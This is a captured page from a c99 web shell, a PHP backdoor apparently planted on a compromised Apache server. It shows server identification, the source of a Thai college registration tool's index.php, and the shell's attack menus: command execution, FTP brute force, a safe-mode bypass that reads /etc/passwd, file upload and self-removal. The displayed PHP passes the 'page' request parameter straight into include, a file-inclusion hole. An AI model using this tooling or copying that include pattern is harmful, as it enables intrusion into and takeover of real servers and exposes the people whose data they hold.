!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reg-tools/   drwxr-xr-x
Free 51.22 GB of 127.8 GB (40.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     index.php (8.57 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

setlocale
(LC_ALL'en_US.UTF-8');
session_start();

header("content-type: text/html; charset=UTF-8");
include(
"include/class.mysqldb.php");
include(
"include/config.inc.php");

if (!
$_SESSION["isLogin"]) header("Location: ./login.php");

?>

<html>

<head>
    <title>Reg-Tools</title>
    <!-- CSS only -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.1.3/css/bootstrap.min.css" rel="stylesheet" />
    <link href="https://cdn.datatables.net/1.12.1/css/dataTables.bootstrap5.min.css" rel="stylesheet" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.5.0/font/bootstrap-icons.css">

    <!-- Select2 -->
    <!-- Styles -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/select2@4.0.13/dist/css/select2.min.css" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/select2-bootstrap-5-theme@1.3.0/dist/select2-bootstrap-5-theme.min.css" />
    <!-- Or for RTL support -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/select2-bootstrap-5-theme@1.3.0/dist/select2-bootstrap-5-theme.rtl.min.css" />
    <!-- Scripts -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.0/dist/jquery.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/select2@4.0.13/dist/js/select2.full.min.js" defer></script>


    <!-- JavaScript Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script>


    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Sarabun:wght@100;400&display=swap" rel="stylesheet">
    <style type="text/css">
        body {
            font-family: 'Sarabun', sans-serif;
        }
    </style>

</head>

<body>
    <!-- Modal logout -->
    <div id="modalConfirmLogout" class="modal fade">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-header flex-column">
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                    <div class="icon-box">
                        <i class="bi bi-exclamation-circle" style="color:LightSalmon; font-size:70px;"></i>
                    </div><br />
                    <h4 class="modal-title text-center">Are you sure?</h4>
                </div>
                <div class="modal-body text-center">
                    <p>ต้องการออกจากระบบใช่หรือไม่</p>
                </div>
                <div class="modal-footer justify-content-center">
                    <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
                    <button type="button" id="btnConfirmLogout" class="btn btn-primary">Logout</button>
                </div>
            </div>
        </div>
    </div>
    <div class="m-1">
        <nav class="navbar navbar-expand-lg navbar-light" style="background-color: #e3f2fd;">
            <a class="navbar-brand ms-2" href="./">Reg-Tools</a>
            <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarNav">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarNav">
                <ul class="navbar-nav">
                    <li class="nav-item dropdown">
                        <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-bs-toggle="dropdown" aria-expanded="false">
                            ปีการศึกษา
                        </a>
                        <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
                            <li><a class="dropdown-item" href="./?page=addTermConfig">เพิ่มข้อมูลปีการศึกษา</a></li>
                            <li><a class="dropdown-item" href="./?page=editTermConfig">แก้ไขข้อมูลปีการศึกษา</a></li>
                        </ul>
                    </li>
                    <li class="nav-item dropdown">
                        <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-bs-toggle="dropdown" aria-expanded="false">
                            หลักสูตร
                        </a>
                        <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
                            <li><a class="dropdown-item" href="./?page=addCurriculum">เพิ่มข้อมูลหลักสูตร</a></li>
                            <li><a class="dropdown-item" href="./?page=editCurriculum">แก้ไขข้อมูลหลักสูตร</a></li>
                        </ul>
                    </li>
                    <li class="nav-item dropdown">
                        <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-bs-toggle="dropdown" aria-expanded="false">
                            รายวิชา
                        </a>
                        <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
                            <li><a class="dropdown-item" href="./?page=addCourse">เพิ่มข้อมูลรายวิชา</a></li>
                            <li><a class="dropdown-item" href="./?page=editCourse">แก้ไขข้อมูลรายวิชา</a></li>
                            <li><a class="dropdown-item" href="./?page=addCourseCSV">Import CSV</a></li>
                        </ul>
                    </li>
                    <li class="nav-item dropdown">
                        <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-bs-toggle="dropdown" aria-expanded="false">
                            หมวดวิชา
                        </a>
                        <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
                            <li><a class="dropdown-item" href="./?page=addCondition">เพิ่มข้อมูลหมวดวิชา</a></li>
                            <li><a class="dropdown-item" href="./?page=editCondition">แก้ไขข้อมูลหมวดวิชา</a></li>
                        </ul>
                    </li>
                    <!--<li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-bs-toggle="dropdown" aria-expanded="false">
                        โครงสร้างหลักสูตร(หน่วยกิต)
                    </a>
                    <ul class="dropdown-menu" aria-labelledby="navbarDropdown">
                        <li><a class="dropdown-item" href="./?page=addCurStructure">เพิ่มข้อมูลหน่วยกิต</a></li>
                        <li><a class="dropdown-item" href="./?page=editCurStructure">แก้ไขข้อมูลหน่วยกิต</a></li>
                    </ul>
                </li>-->
                    <li class="nav-item">
                        <a class="nav-link" href="./?page=curStructure">โครงสร้างหลักสูตร(หน่วยกิต)</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="./?page=curMapping">Mapping หลักสูตร-รายวิชา</a>
                    </li>
                </ul>
            </div>
            <!--<div class="d-flex">
                สวัสดี
                &nbsp;&nbsp;<button class="btn btn-primary btn-sm" type="button">Logout</button>
            </div>-->
            <?php
            
if (isset($_SESSION["isLogin"])) {
            
?>
                <div class="badge bg-primary text-wrap" id="btnLogout" style="width: auto; height: 2rem; cursor: pointer;">
                    <?php
                    
echo $_SESSION["UsName"];
                    
?>
                    <br />Logout
                </div>
            <?php
            
}
            
?>

        </nav>

        <?php
        
if (isset($_REQUEST["page"])) {
            include 
$_REQUEST["page"] . ".php";
        } else {
        
?>
            <br />
            <div class="col d-flex justify-content-center">
                <div class="card" style="width: 70rem;">
                    <div class="card-body">
                        <h5 class="card-title"></h5>
                        <p class="card-text text-center">
                            โปรแกรมช่วยจัดการข้อมูลพื้นฐานระบบทะเบียนและประมวลผลการศึกษา สถาบันพระบรมราชชนก<br />
                            จัดทำโดย นายจิโรจน์ ศรีตรัย วิทยาลัยการสาธารณสุขสิรินธร จังหวัดชลบุรี<br />
                            Email: jiroat@scphc.ac.th
                        </p>
                    </div>
                </div>
            </div>
        <?php
        
}
        
?>
        <!--<div class="col d-flex justify-content-center">
            <footer id="sticky-footer" class="flex-shrink-0 fixed-bottom py-4 bg-light text-muted-50">
                <div class="container text-center">
                    <small>&copy; 2022 Jiroat Sritrai</small>
                </div>
            </footer>
        </div>-->
    </div>

    <script>
        $(document).ready(function() {

            $("#btnLogout").on("click", function() {
                $('#modalConfirmLogout').modal("toggle");
            });

            $("#btnConfirmLogout").on("click", function() {

                window.location.href = "./login.php";

            });

        })
    </script>
</body>

</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0134 ]--